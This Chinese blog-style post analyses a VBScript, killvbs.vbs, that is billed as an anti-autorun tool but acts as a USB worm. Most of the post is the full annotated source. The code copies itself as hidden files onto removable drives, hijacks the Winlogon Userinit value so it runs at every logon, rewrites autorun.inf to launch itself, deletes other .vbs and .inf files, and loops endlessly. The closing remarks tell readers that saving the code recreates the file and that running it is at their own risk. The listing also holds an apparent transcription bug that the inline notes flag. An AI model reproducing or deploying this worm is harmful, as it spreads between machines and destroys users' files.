不是病毒的病毒


可疑文件:killvbs.vbs

发现者:杜少卿

文件来源:USST宣传部副部长的计算机内

症状:执行该文件后发现各盘符的autorun.inf文件自动被删除,并且新建autorun配置文件后依旧被删除,且响应频率极高.后在进程和启动项中都发现可疑项目.最后定位于根目录下的文件killvbs.vbs,打开后发现如下代码:

——————————————————————————–

killvbs.vbs代码
'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'**********************************************************
' Analyst notes (added on review; the code below is unchanged):
' Despite the "Anti autorun" banner, this script behaves as a self-replicating
' worm. It reads its own source text, drops a copy as killVBS.vbs into the
' system folder and into the root of every removable drive, registers itself
' under Winlogon\Userinit so it runs at every interactive logon, rewrites
' autorun.inf on removable drives so that inserting the drive launches the
' copy, and deletes other .vbs and .inf files it finds. Unless started from a
' removable drive it never exits (10 s polling loop), which matches the
' "autorun.inf keeps disappearing" symptom described above.
' Host indicators visible in this code: <SystemDir>\killVBS.vbs and
' <drive>:\killVBS.vbs with all attribute bits set; a Userinit value that
' contains "wscript.exe <SystemDir>\killVBS.vbs"; autorun.inf files containing
' "shellexecute=wscript.exe killVBS.vbs"; a running wscript.exe process whose
' command line names killVBS.vbs.
Option Explicit
' Every runtime error from here on is silently swallowed. This also masks the
' apparent bugs noted below, so the observed behaviour can differ from intent.
On Error Resume Next
' Del is declared but never used. WriteAll is reused for several different
' files, and Count holds a DriveType, not a count.
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
' GetSpecialFolder(0) = Windows folder, GetSpecialFolder(1) = System folder.
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
' Handle to the running script itself; Drv is the drive it was launched from.
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
' OpenAsTextStream(1,-2): ForReading, TristateUseDefault. The script reads its
' own source into AllFile; that buffer is what gets written as each copy below.
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
' NOTE(review): "AllFileAllFile" is not declared, so under Option Explicit both
' assignments raise an error that On Error Resume Next swallows. As printed,
' AllFile therefore stays empty and every dropped copy would be a zero-length
' file. This may be a transcription artifact of "AllFile = AllFile & ..." in
' the original; treat the copy-payload behaviour as unconfirmed.
AllFileAllFile = AllFile & ReadAll.readline
AllFileAllFile = AllFile & vbcrlf
Loop
' DriveType of the launching drive (FSO: 1 = Removable, 2 = Fixed). It decides
' at the bottom of the loop whether the script runs forever.
Count=Drv.DriveType
Do
' Persistence, step 1: drop a copy into the system folder. Attributes = -1
' sets every attribute bit (read-only, hidden, system, archive, ...), which
' hides the file from a default Explorer view.
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
' Persistence, step 2: replace the Winlogon Userinit value so that every
' interactive logon runs userinit.exe followed by wscript.exe killVBS.vbs.
' Detection: a Userinit value with more than the default single userinit.exe
' entry. Remediation should restore the default value rather than delete it,
' since a missing or malformed Userinit value can break interactive logon.
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive
' Fixed drives: delete every file in the drive root whose name ends in "inf".
' LookVBS already compares case-insensitively, so the second call is redundant.
' This is what deletes (legitimate) autorun.inf files on the local disks.
If Drives.DriveType=2 Then
LookVBS "inf",Drives.Path & "\"
LookVBS "INF",Drives.Path & "\"
End if
' Removable or fixed drives other than A:.
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
' Removes a Run entry named MS32DLL (presumably a competing worm's startup
' value), blanks the IE window title and start page, and sets the icon for
' .vbs files. All three are repeated once per drive; they are machine-wide
' and have nothing to do with the drive being iterated.
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
' Deletes every other .vbs in the Windows folder root and in the drive root,
' except files named killVBS.vbs. Legitimate scripts are destroyed too.
LookVBS "vbs",WinDir & "\"
LookVBS "vbs",Drives.Path & "\"
' Removable drives only: propagation.
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
' Drop a hidden copy of the script into the removable drive's root.
If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
WriteAll.Attributes = -1
End If

' Rewrite autorun.inf so that inserting the drive into a host with AutoRun
' enabled launches the dropped copy. Both branches write the same content;
' the first additionally resets attributes on an existing file so it can be
' overwritten (Attributes = -8 clears the low three bits: read-only, hidden,
' system). Note GetFile uses the lowercase name only; if just AUTORUN.INF
' exists on a case-sensitive volume that call fails silently.
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End if
End if
End If
Next
' Unless the script was launched from a removable drive (Count = 1), sleep
' 10 s and repeat the whole scan indefinitely. This is the resident process
' seen in the task list, and why re-created autorun.inf files vanish again.
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
' Deletes every file directly inside SrchPath whose last three characters match
' File2Find (case-insensitive), except files named exactly "killVBS.vbs".
' Subfolders are not descended. Right(Name,3) does not require a dot, so a
' file called e.g. "readme.oinf" or "myvbs" would be matched as well.
'   File2Find - three-character suffix to match ("inf" / "vbs" in the callers)
'   SrchPath  - folder to scan, expected to end with a backslash
' No return value. The parameters are referenced below as srchpath/file2find;
' VBScript identifiers are case-insensitive, so these are the same variables.
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
' DeleteFile(path, force) removes read-only files as well. It does not return
' an object, so the "Set Delete =" form most likely raises an error after the
' deletion has already happened. This sub has no On Error statement of its
' own, so that error presumably propagates to the caller's On Error Resume
' Next, ending this loop after the first match -- which would mean only one
' file per folder is actually deleted per pass. Unconfirmed; hedged.
If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

——————————————————————————–

分析:根据寝室里一位MCP(Microsoft Certified Professional,微软认证专家)的描述,该文件本意是清除系统中的自动运行配置文件(文件开头的注释也有所示意),以防止autorun病毒的运作,但其本身的行为已经具备了病毒文件的要素(见加亮彩色字体,写入注册表),故应识别为病毒文件.

——————————————————————————–

总结:文件编写者的初衷是好的,毕竟现在大多数的病毒是利用autorun来达到欺骗目的.可是程序的执行过程有点“黑”,之前已经有人想出方法来免疫U盘病毒文件了,但这种利用脚本来监控删除autorun的方式倒不失为一种殊途同归的新方式.(将代码保存为killvbs.vbs即为原可疑文件,可以尝试运行,但不推荐运行,后果自负)

SQ.DO

MCITP Enterprise Administrator

